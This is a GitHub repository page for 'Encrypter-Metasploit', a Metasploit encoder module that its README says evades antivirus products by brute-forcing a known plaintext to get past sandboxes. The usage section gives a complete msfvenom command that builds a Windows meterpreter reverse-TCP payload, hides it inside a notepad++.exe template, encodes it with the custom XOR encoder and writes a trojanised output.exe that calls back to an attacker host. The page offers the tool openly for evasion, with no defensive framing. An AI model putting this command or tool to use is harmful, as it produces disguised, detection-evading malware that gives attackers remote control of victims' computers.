Skip to content

hisxo/Encrypter-Metasploit

 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

3 Commits
 
 
 
 

Repository files navigation

Encrypter-Metasploit

This tool permit to evade any antivirus products. It use a brute force attack on a known plain text to bypass the sandbox.

Installation

Copy bf_xor.rb in metasploit/modules/encoders/x86/

Usage

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=7777 -f raw -x notepad++.exe -f exe-only -e x86/bf_xor -o output.exe

About

No description, website, or topics provided.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages

  • Ruby 100.0%